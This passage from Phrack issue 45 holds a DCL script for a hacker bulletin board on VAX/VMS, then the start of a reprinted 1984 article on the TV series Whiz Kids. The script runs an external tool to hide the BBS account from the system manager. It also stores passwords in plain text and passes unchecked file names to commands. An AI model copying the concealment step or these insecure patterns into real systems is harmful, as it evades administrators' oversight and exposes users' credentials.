  11194.                  Volume Five, Issue Forty-Five, File 16 of 28
  11195.  
  11196. ****************************************************************************
  11197.  
  11198.                                 DCL BBS PROGRAM
  11199.  
  11200. -------cut here-------cut here------cut here------cut here------cut here------
  11201.  
  11202. $ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  11203. $ ! Well, this is just a little bbs program, a skeleton on wich u can work,    !
  11204. $ ! add stuff, subroutines, and so on.                                         !
  11205. $ ! I am SURE there are bugs, anyway the only I use to know 'till now is in    !
  11206. $ ! the editor, where anything u write after a "!" will not be saved           !
  11207. $ ! If sumbody wants to help/cooperate/exchange ideas about this program and/or!
  11208. $ ! any Dcl stuff/trick, just write at:                                        !
  11209. $ ! SSGRR@pol88a.polito.it   for internet e-mail                               !
  11210. $ ! (0) 22221122878::SSGRR   for PSI MAIL                                      !
  11211. $ ! Mbx RAOUL on Qsd chat system, x.25 nua (0) 208057040540                    !
  11212. $ ! ANY kind of help and suggestion will be accepted !                         !
  11213. $ ! ANY kind of cooperation with SERIOUS italian and/or european hackers,      !
  11214. $ ! especially concerning x.25 networks, vax/vms, unix, cisco systems will be  !
  11215. $ ! appreciated.                                                               !
  11216. $ !                                                                            !
  11217. $ !                             Raoul / SferraNet Inc.  for Phrack Magazine    !
  11218. $ ! Many thanks to: Nobody. I usually work on my own.                          !
  11219. $ !                                                                            !
  11220. $ !                                                                            !
  11221. $ ! Remember to add the files the program requires, such as:                   !
  11222. $ ! INVI.EXE                                                                   !
  11223. $ ! goodbye.txt                                                                !
  11224. $ ! files.txt                                                                  !
  11225. $ ! etc.....                                                                   !
  11226. $ ! And remember to create the subdirectories the program requires, AND to     !
  11227. $ ! create a [bbs] directory, otherwise to rename [bbs] string, in this        !
  11228. $ ! program, to a different name.                                              !
  11229. $ !                                                                            !
  11230. $ ! I am sorry if program documentation is poor, but this program is mainly    !
  11231. $ ! intended as a skeleton for future developments.                            !
  11232. $ ! I swear next time it will came up with a installation.com file :)          !
  11233. $ !                                                                            !
  11234. $ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  11235. $! BBS PROGRAM RELEASE 2.0
  11236. $! ADDED CALL FUNCTION TO SPEED UP PROCESSES
  11237. $! LAST MODIFIED ON 15/10/1993 BY RAOUL/SFERRANET
  11238. $! BBS PROGRAM
  11239. $! Coded By Raoul/SferraNet
  11240. $!
  11241. $! Featuring:
  11242. $! Internal Mbx option
  11243. $! Kermit (Vms default) and Zmodem download protocols options
  11244. $! internal editor
  11245. $! password change option
  11246. $! logs of dtes, calls source etc
  11247. $! "post a banner" option
  11248. $ ! "BBS" account requires:
  11249. $ ! Privileges: NETMBX, TMPMBX, CMKRNL
  11250. $ ! Defprivileges: NETMBX, TMPMBX, CMKRNL
  11251. $ ! Flags: disnewmail, disctly, restricted
  11252. $ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  11253. $ !This next 3 lines put away error messages ( remove it when testing the
  11254. $ !program, so that you will be able to see wich errors you are getting
  11255. $ set messa /nofac
  11256. $ set messa /notext
  11257. $ set messa /nosev
  11258. $ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  11259. $ ! Defines CLS
  11260. $ ESC[0,8] = 27
  11261. $ CLC == ESC+"[H"+ESC+"[J"
  11262. $ cls := "write sys$output CLC"
  11263. $ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  11264. $!define user's terminal
  11265. $ ! here we check what kind of terminal user has, knowing that for Vms
  11266. $ ! a good graphic mode will be from VT100 on, using this list:
  11267. $ ! unknown = 0
  11268. $ ! VT52    = 64
  11269. $ ! VT100   = 96
  11270. $ ! VT101   = 97
  11271. $ ! VT102   = 98
  11272. $ ! VT105   = 99
  11273. $ ! VT125   = 100
  11274. $ ! VT200   = 110
  11275. $ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  11276. $ cls
  11277. $ write sys$output " Checking Terminal Type....Please Wait...."
  11278. $ set terminal /inquire
  11279. $ ttype = f$getdvi("SYS$COMMAND", "DEVTYPE")
  11280. $ if ttype .ge. 96
  11281. $ then
  11282. $   vt100_flag = 1
  11283. $ else
  11284. $   vt100_flag = 0
  11285. $ endif
  11286. $!
  11287. $ if vt100_flag .eq. 1
  11288. $ then
  11289. $ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  11290. $! This is a list of escape sequences definitions
  11291. $   reverse      == ESC+"[7m" ! turns on inverse video attribute
  11292. $   blink        == ESC+"[5m" ! turns on blinking attribute
  11293. $   blankfromtop == ESC+"[1J" ! blanks screen from top to cursor
  11294. $   blankline    == ESC+"[2K" ! blanks current line
  11295. $   blankendline == ESC+"[0K" ! blanks from cursor to end of line
  11296. $   normal       == ESC+"[0m" ! Resets to normal video attribute
  11297. $   bold         == ESC+"[1m" ! turns on Bold attribute
  11298. $   underline    == ESC+"[4m" ! turns on underline attribute
  11299. $ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  11300. $   write sys$output reverse
  11301. $   write sys$output blink
  11302. $   write sys$output " Your Terminal Is DEC-VTxxx Series Compatible ! "
  11303. $   write sys$output " This Will Help You To Get even MORE&MORE From This Bbs ! "
  11304. $   write sys$output normal
  11305. $   wait 0:00:03
  11306. $ else
  11307. $   write sys$output " Sorry, Your Terminal Isn't DEC-VTxxx Series Compatible "
  11308. $   write sys$output " "
  11309. $   write sys$output " Try to Get a Better Emulation Next Time Dude!!! "
  11310. $   wait 0:00:05
  11311. $   cls
  11312. $ endif
  11313. $ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  11314. $! USER.COM VERSION 1.0 BETA
  11315. $ on error then goto nouser
  11316. $ on severe_error then goto nouser
  11317. $ in  := "inquire /nopunctuation"
  11318. $ out := "write sys$output"
  11319. $ user:
  11320. $ cls
  11321. $ out " "
  11322. $ out "  ** Sferra Bbs Logon ** (C) 1993 Raoul / SferraNet Inc. "
  11323. $ out " "
  11324. $ in usr  "Username: "
  11325. $ if usr .eqs. "" then goto user
  11326. $ if usr .eqs. " " then goto user
  11327. $ open /read mailfile [bbs]'usr'.mail /error=nouser
  11328. $ set term/noecho
  11329. $ in pass "Password: "
  11330. $ set term/echo
  11331. $ read mailfile pw
  11332. $ close mailfile
  11333. $ if pw .eqs. pass then goto bbs
  11334. $ out " "
  11335. $ out "Wrong Password."
  11336. $ wrong:
  11337. $ out " "
  11338. $ in test "Retry or Login as a New User ? (R/N) "
  11339. $ if test .eqs. "N" then goto newusr
  11340. $ cls
  11341. $ goto user
  11342. $ goto bbs
  11343. $ nouser:
  11344. $ out " "
  11345. $ out " User ''usr' Not Found In Users File "
  11346. $ out " "
  11347. $ wait 0:00:02
  11348. $ goto wrong
  11349. $!% author Raoul/SferraNet
  11350. $!% language DCL
  11351. $! Bbs program for Vax/Vms
  11352. $!
  11353. $ bbs:
  11354. $ cls
  11355. $ type [bbs]welcome.txt
  11356. $ wait 00:00:04
  11357. $ user == usr
  11358. $ tt == f$getdvi("TT","DEVNAM")!-"-"
  11359. $! l1 == f$locate(":",TT)
  11360. $! l1 == l1 -1
  11361. $ device == tt
  11362. $ start == f$cvtime(,,"time")
  11363. $ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  11364. $ ! Here we show user bbs in full mode, to get his/her dte, inet address or
  11365. $ ! Decnet node, and put it in a file, then we run invisible.exe to
  11366. $ ! make the user "BBS" invisible
  11367. $ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  11368. $ sh u bbs /f /out=[bbs]'user'.dte
  11369. $ open/append output_file [bbs]users.dat
  11370. $ write output_file "Bbs Users Log on: ",F$time()
  11371. $ write output_file "User: ''user' connected on ''device' at ''start'"
  11372. $ close output_file
  11373. $ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  11374. $! Here we run INVI.EXE, to get invisible at a sh users command, and to avoid
  11375. $! System Manager to detect the bbs user
  11376. $ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  11377. $ run [bbs]invi.exe;1
  11378. $ errcheck:
  11379. $ on control_p then goto mainmenu
  11380. $ on control_y then goto mainmenu
  11381. $ on control_t then goto mainmenu
  11382. $ on control_c then goto mainmenu
  11383. $ on error then goto mainmenu
  11384. $ on severe_error then goto mainmenu
  11385. $ on warning then goto mainmenu
  11386. $ write sys$output " "
  11387. $ out reverse
  11388. $ write sys$output "           Welcome To <BBS NAME>         "
  11389. $ out normal
  11390. $ write sys$output " "
  11391. $ out blink
  11392. $ write sys$output "           Running on a Vax/Vms <VMS VERSION>"
  11393. $ out normal
  11394. $ write sys$output " "
  11395. $ out reverse
  11396. $ write sys$output "          You are connected on line ''device' at ''start'  "
  11397. $ out normal
  11398. $ write sys$output " "
  11399. $ out blink
  11400. $ write sys$output "           Please Wait...   "
  11401. $ out normal
  11402. $ wait 0:00:05
  11403. $ cls
  11404. $ write sys$output " User ''user' connected on ''device' at ''start' "
  11405. $ write sys$output " "
  11406. $ out reverse
  11407. $ write sys$output "           PLEASE POST ME A MESSAGE "
  11408. $ out normal
  11409. $ write sys$output " "
  11410. $ write sys$output "   IF U FIND ANY BUGS OR HAVE ANY SUGGESTION"
  11411. $ wait 0:00:02
  11412. $ cls
  11413. $ write sys$output " "
  11414. $ write sys$output " *** Banner Message *** Read it or Die ! *** "
  11415. $ write sys$output " "
  11416. $ type [bbs]banner.txt
  11417. $ write sys$output " "
  11418. $ inquire /nopunct banner "Press [ENTER] To Continue..."
  11419. $ mainmenu:
  11420. $ cls
  11421. $ write sys$output " "
  11422. $ write sys$output "                         HackTown Bbs   "
  11423. $ write sys$output "                     "
  11424. $ write sys$output "                          Main Menu                "
  11425. $ write sys$output "  "
  11426. $ write sys$output " "
  11427. $ write sys$output " "
  11428. $ write sys$output " "
  11429. $ write sys$output "                        [F] Files Area "
  11430. $ write sys$output "                        [M] Mailboxes Area "
  11431. $ write sys$output "                        [I] Informations About This System "
  11432. $ write sys$output "                        [B] Leave a Banner
  11433. $ write sys$output "                        [U] List Users "
  11434. $ write sys$output "                        [P] Post a Message To SysOp "
  11435. $ write sys$output "                        [L] Logout "
  11436. $ write sys$output " "
  11437. $ write sys$output " "
  11438. $ inquire topmenu "(F,M,I,B,P,L)==>"
  11439. $ if topmenu .eqs. "L" then goto L
  11440. $ if topmenu .eqs. "F" then goto F
  11441. $ if topmenu .eqs. "I" then goto I
  11442. $ if topmenu .eqs. "P" then goto P
  11443. $ if topmenu .eqs. "M" then goto M
  11444. $ if topmenu .eqs. "U" then goto U
  11445. $ if topmenu .eqs. "B" then goto B
  11446. $ if topmenu .eqs. "" then goto mainmenu
  11447. $ if topmenu .eqs. " " then goto mainmenu
  11448. $ goto mainmenu
  11449. $! Banner Message
  11450. $ B:
  11451. $ cls
  11452. $ write sys$output " Editing Banner! End With a Dot (.) "
  11453. $ write sys$output " Notice: Pirating or Incorrects Messages Will Be "
  11454. $ write sys$output " Accepted...Don't Be Clean! ;) "
  11455. $ write sys$output "
  11456. $ del [bbs]banner.txt;* /nolog
  11457. $ open/write banner_file [bbs]banner.txt
  11458. $ write banner_file " Banner Message From user ''usr' Posted at ''start' "
  11459. $ write banner_file " "
  11460. $ write banner_file "***********************************************************"
  11461. $ line=1
  11462. $ more:
  11463. $ inquire /nopunctu text "''line': "
  11464. $ if text .eqs. "." then goto endbanner
  11465. $ write banner_file text
  11466. $ line=line+1
  11467. $ goto more
  11468. $ write banner_file "***********************************************************"
  11469. $ close banner_file
  11470. $ write sys$output " "
  11471. $ write sys$output " Banner Saved! "
  11472. $ wait 0:00:02
  11473. $ goto mainmenu
  11474. $!
  11475. $ U:
  11476. $ cls
  11477. $ type [bbs]users.lis
  11478. $ write sys$output " "
  11479. $ write sys$output " "
  11480. $ inquire /nopunctuation komodo "                            Press [ENTER] To Continue..."
  11481. $ goto mainmenu
  11482. $!
  11483. $ L:
  11484. $ goto bbsbye
  11485. $ logout/full
  11486. $!
  11487. $!
  11488. $! option F
  11489. $!
  11490. $ F:
  11491. $ write sys$output " "
  11492. $ write sys$output " "
  11493. $ cls
  11494. $ write sys$output " "
  11495. $ write sys$output "                          Files Menu "
  11496. $ write sys$output " "
  11497. $ write sys$output "                          [1]  List files "
  11498. $ write sys$output "                          [2]  Type a file "
  11499. $ write sys$output "                          [3]  Download a file "
  11500. $ write sys$output "                          [4]  Upload a file "
  11501. $ write sys$output "                          [5]  Go back to main menu "
  11502. $ inquire files "(1,2,3,4,5)==>"
  11503. $ if files .eqs. "1" then goto 1
  11504. $ if files .eqs. "2" then goto 2
  11505. $ if files .eqs. "3" then goto 3
  11506. $ if files .eqs. "4" then goto 4
  11507. $ if files .eqs. "5" then goto 5
  11508. $ if files .eqs. "" then goto F
  11509. $ if files .eqs. " " then goto F
  11510. $ goto F
  11511. $!
  11512. $ 1:
  11513. $ goto fileslist
  11514. $ inquire/nopunct tasto "Press [ENTER] to continue..."
  11515. $ goto F
  11516. $!
  11517. $ 2:
  11518. $ write sys$output "U can't type files such as .ZIP .EXE .ARJ etc..."
  11519. $ inquire file "File to type ? "
  11520. $ if file .eqs. "" then goto f
  11521. $ if file .eqs " " then goto f
  11522. $ if file .eqs. "login.com" then goto F
  11523. $ inquire page "do you want the file to be typed with or without page pause ? (A/B) "
  11524. $ cls
  11525. $ if page .eqs "a" then goto nopage
  11526. $ if page .eqs. "b" then goto page
  11527. $ goto 2
  11528. $ page:
  11529. $ type [bbs]'file' /nopage
  11530. $ inquire/nopunct tasto "Press [ENTER] to continue..."
  11531. $ cls
  11532. $ goto F
  11533. $!
  11534. $ nopage:
  11535. $ type [bbs]'file' /page
  11536. $ inquire/nopunct tasto " Press [ENTER] to continue..."
  11537. $ cls
  11538. $ goto F
  11539. $!
  11540. $ 3:
  11541. $ cls
  11542. $ write sys$output " "
  11543. $ inquire dl "File to download ?  "
  11544. $ inquire protocol "Protocol ? (Z=Zmodem, K=Kermit) "
  11545. $ if protocol .eqs. "z" then goto zmodem
  11546. $ if protocol .eqs. "k" then goto kermit
  11547. $ goto F
  11548. $ kermit:
  11549. $ if dl .eqs. "" then goto F
  11550. $ if dl .eqs. "login.com" then goto F
  11551. $ if dl .eqs. "bbs.com" then goto F
  11552. $ mcr kermit send [bbs.files]'dl'
  11553. $ exit
  11554. $ goto F
  11555. $!
  11556. $ zmodem:
  11557. $ !!!!! Put here your zmodem program download string, etc
  11558. $!
  11559. $ goto F
  11560. $!
  11561. $ 4:
  11562. $ cls
  11563. $ write sys$output " "
  11564. $ out blink
  11565. $ write sys$output " Thanks for your upload! "
  11566. $ out normal
  11567. $ out reverse
  11568. $ write sys$output " Default transfer protocol is Kermit "
  11569. $ out normal
  11570. $ inquire ul "File to upload ?  "
  11571. $ if ul .eqs. "" then goto F
  11572. $ if ul .eqs. "login.com" then goto F
  11573. $ if ul .eqs. "bbs.com" then goto F
  11574. $ mcr kermit rec [bbs.files]'ul'
  11575. $ exit
  11576. $ open/append [bbs.files]files.txt
  11577. $ write [bbs.files]files.txt "File ''ul' sent by ''user' at ''start' on ''device' "
  11578. $ close [bbs.files]files.txt
  11579. $ inquire desc " Please type a short description for your file "
  11580. $ open/append [bbs.files]files.txt
  11581. $ write  'desc'' [bbs.files]files.txt
  11582. $ write [bbs.files]files.txt "----------------------------------------------------------------------"
  11583. $ close [bbs.files]files.txt
  11584. $ goto F
  11585. $!
  11586. $ 5:
  11587. $ goto mainmenu
  11588. $!
  11589. $ M:
  11590. $ cls
  11591. $ write sys$output "                    MailBox Menu   "
  11592. $ write sys$output " "
  11593. $ write sys$output " "
  11594. $ write sys$output "                    [S] Send a Message "
  11595. $ write sys$output "                    [R] Read Messages in Your Mailbox "
  11596. $ write sys$output "                    [C] Clear Your Mailbox "
  11597. $ write sys$output "                    [D] Delete Your Mailbox "
  11598. $ write sys$output "                    [M] Go Back To Main Menu "
  11599. $ write sys$output " "
  11600. $ write sys$output " "
  11601. $ inquire mailmenu " (S,R,C,D,M)==> "
  11602. $ if mailmenu .eqs. "S" then goto smail
  11603. $ if mailmenu .eqs. "R" then goto rmail
  11604. $ if mailmenu .eqs. "C" then goto cmbx
  11605. $ if mailmenu .eqs. "D" then goto delmail
  11606. $ if mailmenu .eqs. "M" then goto mainmenu
  11607. $ if mailmenu .eqs. "" then goto M
  11608. $ goto M
  11609. $!
  11610. $!
  11611. $ delmail:
  11612. $ write sys$output "                      W A R N I N G ! ! !   "
  11613. $ write sys$output "  "
  11614. $ write sys$output "                Deleting Your Personal Mailbox "
  11615. $ write sys$output "             Will Remove You From The Users File "
  11616. $ write sys$output " "
  11617. $ inquire del "Do You Want To Delete Your Mailbox ? (Y/N) "
  11618. $ if del .eqs. "Y" then goto mbxdely
  11619. $ if del .eqs. "N" then goto mbxdeln
  11620. $ goto M
  11621. $!
  11622. $ mbxdely:
  11623. $ goto dmbx
  11624. $ goto M
  11625. $!
  11626. $ mbxdeln:
  11627. $ cls
  11628. $ write sys$output " "
  11629. $ write sys$output "   Mailbox not Deleted "
  11630. $ wait 0:00:02
  11631. $ goto M
  11632. $!
  11633. $ I:
  11634. $ cls
  11635. $ write sys$output " We're sorry if this system isn't 100% working fine. "
  11636. $ write sys$output " We keep on to work at it. If you find bugs and/or errors, "
  11637. $ write sys$output " please send me an URGENT mail (P option at Main Menu) "
  11638. $ write sys$output " Thanks."
  11639. $ write sys$output " "
  11640. $ write sys$output "                              Bbs Staff "
  11641. $ wait 0:00:03
  11642. $ goto mainmenu
  11643. $!
  11644. $P:
  11645. $ cls
  11646. $ write sys$output " "
  11647. $ define/user_mode sys$input sys$command
  11648. $ mail sys$command <YOUR ACCOUNT> !!!!!!!<-- your VMS account, where you can
  11649. $! receive regular vms mail via the vms mail utility
  11650. $ goto mainmenu
  11651. $!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  11652. $ newusr:
  11653. $!
  11654. $! NEWUSR.COM VERSION 1.0 BETA
  11655. $!
  11656. $ on warning then goto ok
  11657. $ on control_y then goto ok
  11658. $ on error then goto ok
  11659. $ on severe_error then goto ok
  11660. $ set on
  11661. $ in  :== "inquire /nopunctuation"
  11662. $ out :== "write sys$output"
  11663. $!
  11664. $ cls
  11665. $ write sys$output " "
  11666. $ out blink
  11667. $ out " Welcome New User ! "
  11668. $ out normal
  11669. $ out " "
  11670. $ out " "
  11671. $!
  11672. $ in usr  "Username: "
  11673. $ open /read mailfile [bbs]'usr'.mail /error=ok
  11674. $ out " "
  11675. $ out "This Username already Exists."
  11676. $ out " "
  11677. $ wait 0:00:02
  11678. $ exit
  11679. $ ok:
  11680. $ set term/noecho
  11681. $ in pass "Password: "
  11682. $ set term/echo
  11683. $ open /write mailfile [bbs]'usr'.mail
  11684. $ write [bbs]mailfile pass
  11685. $ close [bbs]mailfile
  11686. $ out " "
  11687. $ out "User ''usr' Added To Users File."
  11688. $ out " "
  11689. $ wait 0:00:02
  11690. $ exit
  11691. $ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  11692. $ ! bsbbye, displays a ascii file and logs user out of the system
  11693. $ bbsbye:
  11694. $ cls
  11695. $ type [bbs]goodbye.txt /nopage
  11696. $ FINISH = F$CVTIME(,,"TIME")
  11697. $ WRITE SYS$OUTPUT " "
  11698. $ WRITE SYS$OUTPUT " "
  11699. $ WRITE SYS$OUTPUT " "
  11700. $ WRITE SYS$OUTPUT " "
  11701. $ WRITE SYS$OUTPUT " "
  11702. $ WRITE SYS$OUTPUT " "
  11703. $ WRITE SYS$OUTPUT " "
  11704. $ WRITE SYS$OUTPUT "                  S F E R R A  B B S  ( C )  1 9 9 3 "
  11705. $ WRITE SYS$OUTPUT " "
  11706. $ WRITE SYS$OUTPUT "                             L O G O U T "
  11707. $ WRITE SYS$OUTPUT " "
  11708. $ WRITE SYS$OUTPUT " "
  11709. $ WRITE SYS$OUTPUT " "
  11710. $ WRITE SYS$OUTPUT "                 C A L L  B A C K  S O O N ! ! !"
  11711. $ write sys$output " "
  11712. $ write sys$output  " "
  11713. $ write sys$output  " "
  11714. $ write sys$output  " "
  11715. $ write sys$output  " "
  11716. $ open/append output_file [bbs]users.dat
  11717. $ write output_file "User: ''user' disconnected from ''device' on ''finish'" 
  11718. $ write output_file "-----------------------------------------------------"
  11719. $ close output_file
  11720. $ exit
  11721. $!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  11722. $ smail:
  11723. $!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  11724. $! SENDMAIL.COM VERSION 1.0 BETA
  11725. $!
  11726. $!
  11727. $!
  11728. $ on error then goto nouser
  11729. $ on severe_error then goto nouser
  11730. $ in  :== "inquire /nopunctuation"
  11731. $ out :== "write sys$output"
  11732. $!
  11733. $ cls
  11734. $ out " Write Your Message Below. End With a Dot (.) "
  11735. $!
  11736. $ pass=""
  11737. $ in usr  "From  : "
  11738. $ open /read checkpw [bbs]'usr'.mail /error=wronguspw
  11739. $ set term/noecho
  11740. $ in pw "Password: "
  11741. $ set term/echo
  11742. $ read checkpw pass
  11743. $ if pass .nes. pw then goto wronguspw
  11744. $ if pass .nes. "" then close checkpw
  11745. $ in dest "To    : "
  11746. $ open /append mailfile [bbs]'dest'.mail /error=nouser
  11747. $ in obj  "Object: "
  11748. $ write mailfile "From    : ",usr
  11749. $ write mailfile "To      : ",dest
  11750. $ write mailfile "Object  : ",obj
  11751. $ write mailfile " "
  11752. $ write mailfile "Text  :"
  11753. $ write mailfile " "
  11754. $ line=2
  11755. $ previous:
  11756. $ line=line-1
  11757. $ if line .eq. 0 then line=1
  11758. $ again:
  11759. $ in text "''line': "
  11760. $ if text .eqs. "c" then goto previous
  11761. $ if text .eqs. "." then goto endinput
  11762. $ write mailfile text
  11763. $ line=line+1
  11764. $ goto again
  11765. $ endinput:
  11766. $ write mailfile "------"
  11767. $ close mailfile
  11768. $ out " "
  11769. $ out "Mail Sent."
  11770. $ wait 0:00:02
  11771. $ exit
  11772. $ nouser:
  11773. $ out "The user does not exists, please check the name."
  11774. $ out " "
  11775. $ wait 0:00:02
  11776. $ exit
  11777. $ wronguspw:
  11778. $ out " "
  11779. $ out "You have entered a wrong Username/Password."
  11780. $ out " "
  11781. $ wait 0:00:02
  11782. $ if pass .nes. "" then close checkpw
  11783. $ exit
  11784. $!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  11785. $ rmail:
  11786. $!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  11787. $!
  11788. $!
  11789. $! READMAIL.COM VERSION 1.0 BETA
  11790. $!
  11791. $!
  11792. $!
  11793. $ on error then goto finished
  11794. $ on severe_error then goto finished
  11795. $ in  :== "inquire /nopunctuation"
  11796. $ out :== "write sys$output"
  11797. $!
  11798. $!
  11799. $ out " "
  11800. $ in usr  "Username: "
  11801. $ set term/noecho
  11802. $ in pass "Password: "
  11803. $ set term/echo
  11804. $ open /read mailfile [bbs]'usr'.mail /error=wronguspw
  11805. $ mails=0
  11806. $ read mailfile pw
  11807. $ if pw .nes. pass then goto wronguspw
  11808. $ again:
  11809. $ read mailfile text /end=finished
  11810. $ if text .eqs. "------" then gosub pause
  11811. $ out text
  11812. $ goto again
  11813. $ finished:
  11814. $ close mailfile
  11815. $ if mails .eq. 0 then goto nomails
  11816. $ out " "
  11817. $ out "End of Mails."
  11818. $ wait 0:00:02
  11819. $ exit
  11820. $ nomails:
  11821. $ out "You have no mails."
  11822. $ out " "
  11823. $ wait 0:00:02
  11824. $ exit
  11825. $ pause:
  11826. $ out " "
  11827. $ in more "Press any key to read next mail, press X to exit."
  11828. $ if more .eqs. "X" then goto exitmail
  11829. $ text=CLC
  11830. $ mails=mails+1
  11831. $ return
  11832. $ wronguspw:
  11833. $ out " "
  11834. $ out "You have entered a wrong Username/Password."
  11835. $ out " "
  11836. $ close mailfile
  11837. $ exit
  11838. $ exitmail:
  11839. $ close mailfile
  11840. $ exit
  11841. $!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  11842. $ cmbx:
  11843. $!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  11844. $!
  11845. $! CLEARMAIL.COM VERSION 1.0 BETA
  11846. $!
  11847. $!
  11848. $!
  11849. $ on error then goto mistake
  11850. $ on severe_error then goto mistake
  11851. $ in  :== "inquire /nopunctuation"
  11852. $ out :== "write sys$output"
  11853. $!
  11854. $ cls
  11855. $!
  11856. $ pass=""
  11857. $ in usr  "Username: "
  11858. $ open /read mailfile [bbs]'usr'.mail /error=wronguspw
  11859. $ set term/noecho
  11860. $ in pass "Password: "
  11861. $ set term/echo
  11862. $ mails=0
  11863. $ read mailfile pw
  11864. $ if pw .nes. pass then goto wronguspw
  11865. $ close mailfile
  11866. $ open /write newfile [bbs]usr.tmp /error=wronguspw
  11867. $ write newfile pw
  11868. $ close newfile
  11869. $ delete [bbs]'usr'.mail;*
  11870. $ rename [bbs]usr.tmp [bbs]'usr'.mail /nolog
  11871. $ cls
  11872. $ out " "
  11873. $ out "Mailbox Cleared."
  11874. $ wait 0:00:02
  11875. $ exit
  11876. $ mistake:
  11877. $ cls
  11878. $ out " "
  11879. $ out "An error has occurred, contact Sysop."
  11880. $ out " "
  11881. $ exit
  11882. $ wronguspw:
  11883. $ cls
  11884. $ out " "
  11885. $ out "You have entered a wrong Username/Password."
  11886. $ out " "
  11887. $ wait 0:00:02
  11888. $ if pass .nes. "" then close mailfile
  11889. $ exit
  11890. $!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  11891. $ Dmbx:
  11892. $!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  11893. $!
  11894. $! DELETEMBX.COM VERSION 1.0 BETA
  11895. $!
  11896. $!
  11897. $!
  11898. $ on error then goto nouser
  11899. $ on severe_error then goto nouser
  11900. $ in  :== "inquire /nopunctuation"
  11901. $ out :== "write sys$output"
  11902. $ out " "
  11903. $!
  11904. $!
  11905. $ in usr  "Username: "
  11906. $ open /read mailfile [bbs]'usr'.mail /error=nouser
  11907. $ set term/noecho
  11908. $ in pass "Password: "
  11909. $ set term/echo
  11910. $ read mailfile pw
  11911. $ close mailfile
  11912. $ if pw .eqs. pass then goto deleteit
  11913. $ out " "
  11914. $ out "Wrong Password."
  11915. $ wait 0:00:02
  11916. $ exit
  11917. $ deleteit:
  11918. $ delete [bbs]'usr'.mail;* /nolog
  11919. $ out " "
  11920. $ out "Mailbox Deleted."
  11921. $ out " "
  11922. $ wait 0:00:02
  11923. $ exit
  11924. $ nouser:
  11925. $ out " "
  11926. $ out "This Mailbox doesn't exists!"
  11927. $ out " "
  11928. $ wait 0:00:02
  11929. $!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  11930. $ fileslist
  11931. $!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  11932. $ fileslist: subroutine
  11933. $ cls
  11934. $ type [bbs.files]files.txt
  11935. $ write sys$output " "
  11936. $ exit
  11937.  
  11938.                               ==Phrack Magazine==
  11939.  
  11940.                  Volume Five, Issue Forty-Five, File 17 of 28
  11941.  
  11942. ****************************************************************************
  11943.  
  11944.  
  11945. [While scouring through the fire hazard I call a bedroom, I stumbled upon
  11946. this piece of history.  I don't know how many of you will remember this,
  11947. or moreover, how many of you will appreciate it, but here it is
  11948. anyway.]
  11949.  
  11950. ---------------------------------------------------------------------------
  11951. (From Video Games, No. 16, January 1984)
  11952.  
  11953. Hollywood-Style Bits and Bytes
  11954.  
  11955. Whiz Kids' Executive Producer Phil DeGuere Takes You Behind the Scenes
  11956. of His Hit TV Series
  11957.  
  11958. by Richard Goodwin
  11959.  
  11960. "I want to overcome what appears to be peoples' innate fear of computers
